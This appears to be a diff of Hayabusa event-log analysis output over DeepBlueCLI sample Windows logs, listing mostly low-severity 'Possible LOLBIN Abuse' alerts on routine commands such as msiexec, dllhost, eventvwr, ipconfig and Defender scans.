+2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 02:31:58.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:35.821 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
